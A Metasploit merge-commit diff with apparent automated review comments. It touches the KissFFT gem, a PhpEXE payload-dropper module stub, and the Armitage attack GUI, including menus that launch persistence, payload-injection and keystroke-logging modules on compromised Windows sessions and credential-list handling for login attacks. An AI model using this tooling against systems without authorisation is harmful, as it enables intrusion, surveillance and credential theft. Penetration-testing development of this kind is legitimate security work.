Merge branch 'master' into bug/wrong-file_changed-argument
Conflicts: lib/msf/core/modules/loader/base.rbunstable
commit
055f95898d
2
Rakefile
2
Rakefile
|
@ -37,7 +37,7 @@ namespace :yard do
|
|||
task :stats => :environment do
|
||||
stats = YARD::CLI::Stats.new
|
||||
yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files
|
||||
stats.run *yard_arguments
|
||||
stats.run(*yard_arguments)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -1,6 +1,23 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
16 Oct 12 (tested against msf 15972)
|
||||
---------
|
||||
- Added port 5985 to MSF Scans list.
|
||||
- Meterpreter -> Access -> Persistence sets ACTION option for you
|
||||
- Changed how LHOST and LPORT are set globally to prevent Ruby
|
||||
character encoding conversion error in the framework.
|
||||
- Pass Session, Log Keystrokes, and Persist now query module info
|
||||
in a separate thread (avoids a deadlock opportunity)
|
||||
- Armitage now shows folder/URL in a popup dialog for environments
|
||||
where JDesktop API to open them directly is not supported
|
||||
- Check all credentials option now filters the list to avoid trying
|
||||
a pair of credentials twice.
|
||||
- Armitage's exploit payload selection now selects cmd/unix/interact
|
||||
when appropriate.
|
||||
- Explore -> Processes now works with Java Meterpreter again.
|
||||
- MSF Scans feature now runs http_version against port 443
|
||||
|
||||
5 Sept 12 (tested against msf r15804)
|
||||
---------
|
||||
- Setup dialog now trims host, port, user, and pass fields.
|
||||
|
|
|
@ -0,0 +1,2 @@
|
|||
source "http://rubygems.org"
|
||||
gemspec
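Review bot: `source "http://rubygems.org"` resolves and downloads every dependency over plain HTTP, so nothing protects the gem fetch from tampering on the wire; change it to `source "https://rubygems.org"`. The gemspec this Gemfile pulls in declares a native extension (`ext/kissfft/extconf.rb`), so whatever is fetched here gets compiled and loaded into the framework process, which makes transport integrity for this file worth the one-character fix.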
|
|
@ -1,7 +1,8 @@
|
|||
Kiss FFT library
|
||||
==================
|
||||
|
||||
Copyright (c) 2003-2006 Mark Borgerding
|
||||
|
||||
Copyright (c) 2003-2010 Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
|
@ -13,11 +14,10 @@ Redistribution and use in source and binary forms, with or without modification,
|
|||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
|
||||
Ruby wrapper layer
|
||||
==================
|
||||
|
||||
Copyright (C) 2009 H D Moore
|
||||
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
|
||||
|
||||
All rights reserved.
|
||||
|
|
@ -0,0 +1 @@
|
|||
require "bundler/gem_tasks"
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
Copyright (c) 2003-2010, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
|
@ -148,3 +148,17 @@ struct kiss_fft_state{
|
|||
/* a debugging function */
|
||||
#define pcpx(c)\
|
||||
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )
|
||||
|
||||
|
||||
#ifdef KISS_FFT_USE_ALLOCA
|
||||
// define this to allow use of alloca instead of malloc for temporary buffers
|
||||
// Temporary buffers are used in two case:
|
||||
// 1. FFT sizes that have "bad" factors. i.e. not 2,3 and 5
|
||||
// 2. "in-place" FFTs. Notice the quotes, since kissfft does not really do an in-place transform.
|
||||
#include <alloca.h>
|
||||
#define KISS_FFT_TMP_ALLOC(nbytes) alloca(nbytes)
|
||||
#define KISS_FFT_TMP_FREE(ptr)
|
||||
#else
|
||||
#define KISS_FFT_TMP_ALLOC(nbytes) KISS_FFT_MALLOC(nbytes)
|
||||
#define KISS_FFT_TMP_FREE(ptr) KISS_FFT_FREE(ptr)
|
||||
#endif
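Review bot: `#define KISS_FFT_TMP_ALLOC(nbytes) alloca(nbytes)` has no failure path and no size bound, and the two call sites this commit introduces size it from runtime data (kiss_fft_stride allocates `sizeof(kiss_fft_cpx)*st->nfft`, kf_bfly_generic allocates `sizeof(kiss_fft_cpx)*p`), so with KISS_FFT_USE_ALLOCA defined a large transform or a large prime factor silently overruns the stack instead of reporting an allocation failure. At minimum document the contract on the macro, e.g. `/* alloca cannot fail: callers must keep nbytes small (nfft and bad-factor p bound it) */`; better, make the alloca branch fall back to KISS_FFT_MALLOC above a fixed byte threshold, which keeps the fast path for the common small sizes. The comment block above the `#include <alloca.h>` is a good place to state which sizes are considered safe.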
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
Copyright (c) 2003-2010, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
|
@ -18,21 +18,6 @@ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
|||
fixed or floating point complex numbers. It also delares the kf_ internal functions.
|
||||
*/
|
||||
|
||||
static kiss_fft_cpx *scratchbuf=NULL;
|
||||
static size_t nscratchbuf=0;
|
||||
static kiss_fft_cpx *tmpbuf=NULL;
|
||||
static size_t ntmpbuf=0;
|
||||
|
||||
#define CHECKBUF(buf,nbuf,n) \
|
||||
do { \
|
||||
if ( nbuf < (size_t)(n) ) {\
|
||||
free(buf); \
|
||||
buf = (kiss_fft_cpx*)KISS_FFT_MALLOC(sizeof(kiss_fft_cpx)*(n)); \
|
||||
nbuf = (size_t)(n); \
|
||||
} \
|
||||
}while(0)
|
||||
|
||||
|
||||
static void kf_bfly2(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
|
@ -69,6 +54,7 @@ static void kf_bfly4(
|
|||
const size_t m2=2*m;
|
||||
const size_t m3=3*m;
|
||||
|
||||
|
||||
tw3 = tw2 = tw1 = st->twiddles;
|
||||
|
||||
do {
|
||||
|
@ -222,29 +208,30 @@ static void kf_bfly_generic(
|
|||
kiss_fft_cpx t;
|
||||
int Norig = st->nfft;
|
||||
|
||||
CHECKBUF(scratchbuf,nscratchbuf,p);
|
||||
kiss_fft_cpx * scratch = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC(sizeof(kiss_fft_cpx)*p);
|
||||
|
||||
for ( u=0; u<m; ++u ) {
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
scratchbuf[q1] = Fout[ k ];
|
||||
C_FIXDIV(scratchbuf[q1],p);
|
||||
scratch[q1] = Fout[ k ];
|
||||
C_FIXDIV(scratch[q1],p);
|
||||
k += m;
|
||||
}
|
||||
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
int twidx=0;
|
||||
Fout[ k ] = scratchbuf[0];
|
||||
Fout[ k ] = scratch[0];
|
||||
for (q=1;q<p;++q ) {
|
||||
twidx += fstride * k;
|
||||
if (twidx>=Norig) twidx-=Norig;
|
||||
C_MUL(t,scratchbuf[q] , twiddles[twidx] );
|
||||
C_MUL(t,scratch[q] , twiddles[twidx] );
|
||||
C_ADDTO( Fout[ k ] ,t);
|
||||
}
|
||||
k += m;
|
||||
}
|
||||
}
|
||||
KISS_FFT_TMP_FREE(scratch);
|
||||
}
|
||||
|
||||
static
|
||||
|
@ -265,7 +252,8 @@ void kf_work(
|
|||
#ifdef _OPENMP
|
||||
// use openmp extensions at the
|
||||
// top-level (not recursive)
|
||||
if (fstride==1) {
|
||||
if (fstride==1 && p<=5)
|
||||
{
|
||||
int k;
|
||||
|
||||
// execute the p different work units in different threads
|
||||
|
@ -380,14 +368,15 @@ kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem
|
|||
}
|
||||
|
||||
|
||||
|
||||
|
||||
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
|
||||
{
|
||||
if (fin == fout) {
|
||||
CHECKBUF(tmpbuf,ntmpbuf,st->nfft);
|
||||
//NOTE: this is not really an in-place FFT algorithm.
|
||||
//It just performs an out-of-place FFT into a temp buffer
|
||||
kiss_fft_cpx * tmpbuf = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC( sizeof(kiss_fft_cpx)*st->nfft);
|
||||
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
|
||||
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
|
||||
KISS_FFT_TMP_FREE(tmpbuf);
|
||||
}else{
|
||||
kf_work( fout, fin, 1,in_stride, st->factors,st );
|
||||
}
|
||||
|
@ -399,17 +388,9 @@ void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
|
|||
}
|
||||
|
||||
|
||||
/* not really necessary to call, but if someone is doing in-place ffts, they may want to free the
|
||||
buffers from CHECKBUF
|
||||
*/
|
||||
void kiss_fft_cleanup(void)
|
||||
{
|
||||
free(scratchbuf);
|
||||
scratchbuf = NULL;
|
||||
nscratchbuf=0;
|
||||
free(tmpbuf);
|
||||
tmpbuf=NULL;
|
||||
ntmpbuf=0;
|
||||
// nothing needed any more
|
||||
}
|
||||
|
||||
int kiss_fft_next_fast_size(int n)
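Review bot: In kiss_fft_stride the new `kiss_fft_cpx * tmpbuf = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC( sizeof(kiss_fft_cpx)*st->nfft);` is handed straight to kf_work and memcpy with no NULL check; when KISS_FFT_USE_ALLOCA is not defined the macro expands to KISS_FFT_MALLOC (malloc, or _mm_malloc in the SIMD build), which returns NULL on failure, so an allocation failure becomes a NULL dereference inside kf_work. The same applies to `scratch` in kf_bfly_generic (`kiss_fft_cpx * scratch = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC(sizeof(kiss_fft_cpx)*p);`). Both functions return void, so the cheapest fix is `if (!tmpbuf) return;` and `if (!scratch) return;` right after each allocation, with a comment that the alloca build cannot take this path; the old CHECKBUF macro had the same gap, but the replacement is the code now under review.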
|
|
@ -5,7 +5,6 @@
|
|||
#include <stdio.h>
|
||||
#include <math.h>
|
||||
#include <string.h>
|
||||
#include <malloc.h>
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
|
@ -27,9 +26,11 @@ extern "C" {
|
|||
#ifdef USE_SIMD
|
||||
# include <xmmintrin.h>
|
||||
# define kiss_fft_scalar __m128
|
||||
#define KISS_FFT_MALLOC(nbytes) memalign(16,nbytes)
|
||||
#define KISS_FFT_MALLOC(nbytes) _mm_malloc(nbytes,16)
|
||||
#define KISS_FFT_FREE _mm_free
|
||||
#else
|
||||
#define KISS_FFT_MALLOC malloc
|
||||
#define KISS_FFT_FREE free
|
||||
#endif
|
||||
|
||||
|
|
@ -19,9 +19,9 @@ struct kiss_fftr_state{
|
|||
kiss_fft_cfg substate;
|
||||
kiss_fft_cpx * tmpbuf;
|
||||
kiss_fft_cpx * super_twiddles;
|
||||
#ifdef USE_SIMD
|
||||
long pad;
|
||||
#endif
|
||||
#ifdef USE_SIMD
|
||||
void * pad;
|
||||
#endif
|
||||
};
|
||||
|
||||
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)
|
|
@ -0,0 +1,16 @@
|
|||
# -*- encoding: utf-8 -*-
|
||||
|
||||
Gem::Specification.new do |s|
|
||||
s.name = "kissfft"
|
||||
s.version = "0.0.1"
|
||||
s.authors = ["HD Moore"]
|
||||
s.email = ["hdm@rapid7.com"]
|
||||
s.homepage = ""
|
||||
s.summary = %q{Ruby wrapper around the KisFFT library for performing FFTs}
|
||||
s.description = %q{Provides access to the KissFFT library for performing fast-fourier transforms from Ruby }
|
||||
|
||||
s.files = Dir.glob('lib/**/*.rb') + Dir.glob('ext/**/*.{c,h,rb}') + [ "LICENSE" ]
|
||||
s.test_files = Dir.glob('test/**/*.{rb,data}')
|
||||
s.extensions = [ 'ext/kissfft/extconf.rb' ]
|
||||
s.require_paths = ["lib"]
|
||||
end
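Review bot: `s.summary` misspells the library as "KisFFT" while `s.description` and the file header use "KissFFT"; change it to `s.summary = %q{Ruby wrapper around the KissFFT library for performing FFTs}`. `s.homepage = ""` is also empty, which is what consumers of the gem see as its project link; either fill it in or drop the line rather than publishing a blank value. The `s.files` globs are evaluated when the gemspec is loaded, so building from a tree that contains stray files under `lib/` or `ext/` would package them too — worth a short comment on that line.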
|
|
@ -3,7 +3,7 @@
|
|||
<center><h1>Armitage 1.44</h1></center>
|
||||
|
||||
<p>An attack management tool for Metasploit®
|
||||
<br />Release: 5 Sept 12</p>
|
||||
<br />Release: 16 Oct 12</p>
|
||||
<br />
|
||||
<p>Developed by:</p>
|
||||
|
||||
|
|
|
@ -349,6 +349,9 @@ sub best_payload {
|
|||
else if ("java/jsp_shell_bind_tcp" in $compatible) {
|
||||
return "java/jsp_shell_bind_tcp";
|
||||
}
|
||||
else if ("cmd/unix/interact" in $compatible) {
|
||||
return "cmd/unix/interact";
|
||||
}
|
||||
else {
|
||||
return "generic/shell_bind_tcp";
|
||||
}
|
||||
|
|
|
@ -475,7 +475,12 @@ sub gotoFile {
|
|||
return lambda({
|
||||
local('$exception');
|
||||
try {
|
||||
[[Desktop getDesktop] open: $f];
|
||||
if ([Desktop isDesktopSupported]) {
|
||||
[[Desktop getDesktop] open: $f];
|
||||
}
|
||||
else {
|
||||
ask("Browse to this file:", $f);
|
||||
}
|
||||
}
|
||||
catch $exception {
|
||||
showError("Could not open $f $+ \n $+ $exception");
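Review bot: `if ([Desktop isDesktopSupported])` only tells you the Desktop class works on this platform; it does not guarantee that the OPEN action is supported, so on such a platform `[[Desktop getDesktop] open: $f]` still throws and the user lands in the showError path rather than the new `ask("Browse to this file:", $f)` fallback the change is meant to provide. Extend the condition to also check the specific action via the desktop object's isSupported with Desktop.Action.OPEN, and take the ask branch otherwise. The gotoURL hunk in the menu file has the identical shape with `browse:` and should check Desktop.Action.BROWSE the same way. gotoFile's enclosing lambda and the catch block continue outside this hunk.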
|
||||
|
|
|
@ -356,6 +356,16 @@ sub _launch_dialog {
|
|||
if (!isShift($1)) {
|
||||
[$dialog setVisible: 0];
|
||||
}
|
||||
|
||||
# fix some module options...
|
||||
if ($command eq "windows/manage/persistence") {
|
||||
if ('REXE' in $options) {
|
||||
$options['ACTION'] = 'REXE';
|
||||
}
|
||||
else {
|
||||
$options['ACTION'] = 'TEMPLATE';
|
||||
}
|
||||
}
|
||||
|
||||
# it's go time buddy... time to filter some stuff...
|
||||
($type, $command, $options) = filter_data("user_launch", $type, $command, $options);
|
||||
|
|
|
@ -188,7 +188,12 @@ sub main_attack_items {
|
|||
|
||||
sub gotoURL {
|
||||
return lambda({
|
||||
[[Desktop getDesktop] browse: $url];
|
||||
if ([Desktop isDesktopSupported]) {
|
||||
[[Desktop getDesktop] browse: $url];
|
||||
}
|
||||
else {
|
||||
ask("Browse to this URL:", $url);
|
||||
}
|
||||
}, $url => [[new URL: $1] toURI]);
|
||||
}
|
||||
|
||||
|
|
|
@ -191,11 +191,15 @@ sub showMeterpreterMenu {
|
|||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Persist", 'P', lambda({
|
||||
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
thread(lambda({
|
||||
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Pass Session", 'S', lambda({
|
||||
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
thread(lambda({
|
||||
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
|
||||
setupMenu($j, "meterpreter_access", @($sid));
|
||||
|
@ -241,7 +245,9 @@ sub showMeterpreterMenu {
|
|||
item($j, "Show Processes", 'P', lambda({ createProcessBrowser($sid); }, $sid => "$sid"));
|
||||
if ("*win*" iswm $platform) {
|
||||
item($j, "Log Keystrokes", 'K', lambda({
|
||||
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
|
||||
thread(lambda({
|
||||
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
}
|
||||
|
||||
|
@ -305,6 +311,9 @@ sub launch_msf_scans {
|
|||
if ('RPORT' in %o) {
|
||||
$port = %o['RPORT']['default'];
|
||||
push(%ports[$port], $scanner);
|
||||
if ($port == 80) {
|
||||
push(%ports['443'], $scanner);
|
||||
}
|
||||
}
|
||||
|
||||
safetyCheck();
|
||||
|
@ -313,7 +322,7 @@ sub launch_msf_scans {
|
|||
|
||||
# add these ports to our list of ports to scan.. these come from querying all of Metasploit's modules
|
||||
# for the default ports
|
||||
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902)) {
|
||||
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985)) {
|
||||
$temp = %ports[$port];
|
||||
}
|
||||
|
||||
|
@ -343,7 +352,12 @@ sub launch_msf_scans {
|
|||
if ($port in %ports) {
|
||||
$modules = %ports[$port];
|
||||
foreach $module ($modules) {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
|
||||
if ($port == 443) {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24, SSL => "1")));
|
||||
}
|
||||
else {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -297,19 +297,24 @@ sub show_login_dialog {
|
|||
}
|
||||
|
||||
sub createUserPassFile {
|
||||
local('$handle $user $pass $type $row $2 $name');
|
||||
local('$handle $user $pass $type $row $2 $name %entries');
|
||||
$name = "userpass" . rand(10000) . ".txt";
|
||||
|
||||
$handle = openf("> $+ $name");
|
||||
# loop through our entries and store them
|
||||
%entries = ohash();
|
||||
foreach $row ($1) {
|
||||
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
|
||||
if ($type eq "password" || $type eq $2) {
|
||||
println($handle, "$user $pass");
|
||||
%entries["$user $pass"] = "$user $pass";
|
||||
}
|
||||
else {
|
||||
println($handle, "$user");
|
||||
%entries[$user] = $user;
|
||||
}
|
||||
}
|
||||
|
||||
# print out unique entry values
|
||||
$handle = openf("> $+ $name");
|
||||
printAll($handle, values(%entries));
|
||||
closef($handle);
|
||||
|
||||
if ($client !is $mclient) {
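Review bot: The dedup keys can collide across the two branches: a password entry is stored under `"$user $pass"` while a non-password entry is stored under `$user`, so a username containing a space (constructed example: user `a b` with no password versus user `a` with password `b`) maps to the same key and one line is silently dropped from the output. Prefix the key with the branch so the two kinds cannot alias, e.g. `%entries["p $user $pass"] = "$user $pass";` and `%entries["u $user"] = $user;` — values(%entries) still yields the same lines. Separately, the file written by `$handle = openf("> $+ $name")` holds credentials in clear text under a guessable name in the working directory with default permissions; if the rest of createUserPassFile (outside this hunk) does not delete it once the scan is launched, that should be added or at least noted in a comment.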
|
||||
|
|
|
@ -27,6 +27,12 @@ sub parseProcessList {
|
|||
# REMOVEME--this is a backwards compatability hack.
|
||||
@rows = parseTextTable($2, @("PID", "Name", "Arch", "Session", "User", "Path"));
|
||||
}
|
||||
|
||||
# this is the format for Java meterpreter
|
||||
if (size(@rows) == 0) {
|
||||
@rows = parseTextTable($2, @("PID", "Name", "Arch", "User", "Path"));
|
||||
}
|
||||
|
||||
foreach $row (@rows) {
|
||||
[%processes[$1] addEntry: $row];
|
||||
}
|
||||
|
|
|
@ -355,7 +355,7 @@ sub client {
|
|||
|
||||
sub main {
|
||||
global('$client $mclient');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
|
||||
|
||||
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
|
||||
|
||||
|
@ -400,9 +400,6 @@ sub main {
|
|||
$mclient = $client;
|
||||
initConsolePool(); # this needs to happen... right now.
|
||||
|
||||
# set the LHOST to whatever the user specified
|
||||
call_async($client, "core.setg", "LHOST", $host);
|
||||
|
||||
# we need this global to be set so our reverse listeners work as expected.
|
||||
$MY_ADDRESS = $host;
|
||||
|
||||
|
@ -423,6 +420,13 @@ sub main {
|
|||
$lock_lock = semaphore(1);
|
||||
$cach_lock = semaphore(1);
|
||||
|
||||
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
|
||||
$console = createConsole($client);
|
||||
call($client, "console.write", $console, "setg LHOST $host $+ \n");
|
||||
sleep(2000);
|
||||
# absorb the output of this command which is LHOST => ...
|
||||
call($client, "console.read", $console);
|
||||
|
||||
#
|
||||
# create a thread to push console messages to the event queue for all clients.
|
||||
#
|
||||
|
@ -437,7 +441,7 @@ sub main {
|
|||
release($poll_lock);
|
||||
}
|
||||
}
|
||||
}, \$client, \$poll_lock, \@events, $console => createConsole($client));
|
||||
}, \$client, \$poll_lock, \@events, \$console);
|
||||
|
||||
#
|
||||
# Create a shared hash that contains a thread for each session...
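Review bot: The new LHOST setup (`call($client, "console.write", $console, "setg LHOST $host $+ \n");` followed by `sleep(2000);` and one `console.read`) assumes the framework finishes the command within two seconds; if it does not, the `LHOST => ...` output is still pending, and because the console-pump thread now shares the same console (`\$console` in the lambda) it presumably surfaces that output as an event to every client. Loop on console.read until the response reports the console as not busy and returns no data, instead of a fixed sleep. `$host` is also spliced verbatim into a console command line; it comes from the setup dialog rather than a remote party, but a value containing a newline would run as a second console command, so validating it as a hostname/IP before building the string is cheap insurance. The setg helper in the console file builds its command the same way (`"setg $1 $2 $+ \n"`) and would benefit from the same validation.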
|
||||
|
|
|
@ -152,7 +152,10 @@ sub createConsoleTab {
|
|||
|
||||
sub setg {
|
||||
%MSF_GLOBAL[$1] = $2;
|
||||
call_async($client, "core.setg", $1, $2);
|
||||
local('$c');
|
||||
$c = createConsole($client);
|
||||
call_async($client, "console.write", $c, "setg $1 $2 $+ \n");
|
||||
call_async($client, "console.release", $c);
|
||||
}
|
||||
|
||||
sub createDefaultHandler {
|
||||
|
|
|
@ -104,6 +104,9 @@ public class ConsoleClient implements Runnable, ActionListener {
|
|||
if (destroyCommand != null) {
|
||||
((RpcAsync)connection).execute_async(destroyCommand, new Object[] { session });
|
||||
}
|
||||
|
||||
/* we don't need to keep reading from this console */
|
||||
kill();
|
||||
}
|
||||
|
||||
protected void finalize() {
|
||||
|
|
|
@ -1,6 +1,23 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
16 Oct 12 (tested against msf 15972)
|
||||
---------
|
||||
- Added port 5985 to MSF Scans list.
|
||||
- Meterpreter -> Access -> Persistence sets ACTION option for you
|
||||
- Changed how LHOST and LPORT are set globally to prevent Ruby
|
||||
character encoding conversion error in the framework.
|
||||
- Pass Session, Log Keystrokes, and Persist now query module info
|
||||
in a separate thread (avoids a deadlock opportunity)
|
||||
- Armitage now shows folder/URL in a popup dialog for environments
|
||||
where JDesktop API to open them directly is not supported
|
||||
- Check all credentials option now filters the list to avoid trying
|
||||
a pair of credentials twice.
|
||||
- Armitage's exploit payload selection now selects cmd/unix/interact
|
||||
when appropriate.
|
||||
- Explore -> Processes now works with Java Meterpreter again.
|
||||
- MSF Scans feature now runs http_version against port 443
|
||||
|
||||
5 Sept 12 (tested against msf r15804)
|
||||
---------
|
||||
- Setup dialog now trims host, port, user, and pass fields.
|
||||
|
|
|
@ -80,6 +80,12 @@ module Exploit::Remote::HttpServer
|
|||
def print_debug(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
#
|
||||
# :category: print_* overrides
|
||||
# Prepends client and module name if inside a thread with a #cli
|
||||
def print_warning(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
|
||||
# :category: print_* overrides
|
||||
# Prepends client and module name if inside a thread with a #cli
|
||||
|
@ -101,6 +107,11 @@ module Exploit::Remote::HttpServer
|
|||
def vprint_debug(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
# :category: print_* overrides
|
||||
# Prepends client and module name if inside a thread with a #cli
|
||||
def vprint_warning(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
|
|
|
@ -88,3 +88,6 @@ require 'msf/core/exploit/java'
|
|||
# WBEM
|
||||
require 'msf/core/exploit/wbemexec'
|
||||
|
||||
#WinRM
|
||||
require 'msf/core/exploit/winrm'
|
||||
|
||||
|
|
|
@ -0,0 +1,88 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
###
|
||||
#
|
||||
# This module exposes a simple method to create an payload in an executable.
|
||||
#
|
||||
###
|
||||
|
||||
require 'msf/core/payload/php'
|
||||
|
||||
module Msf
|
||||
module Exploit::PhpEXE
|
||||
include Exploit::EXE
|
||||
include Payload::Php
|
||||
|
||||
#
|
||||
# Generate a first-stage php payload.
|
||||
#
|
||||
# For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?>
|
||||
# markers.
|
||||
#
|
||||
# For target architectures other than ARCH_PHP, this will base64 encode an
|
||||
# appropriate executable and drop it on the target system. After running
|
||||
# it, the generated code will attempt to unlink the dropped executable which
|
||||
# will certainly fail on Windows.
|
||||
#
|
||||
# @option opts [String] :writable_path A path on the victim where we can
|
||||
# write an executable. Uses current directory if not given.
|
||||
# @option opts [Boolean] :unlink_self Whether to call unlink(__FILE__); in
|
||||
# the payload. Good idea for arbitrary-file-upload vulns, bad idea for
|
||||
# write-to-a-config-file vulns
|
||||
#
|
||||
# @return [String] A PHP payload that will drop an executable for non-php
|
||||
# target architectures
|
||||
#
|
||||
# @todo Test on Windows
|
||||
def get_write_exec_payload(opts={})
|
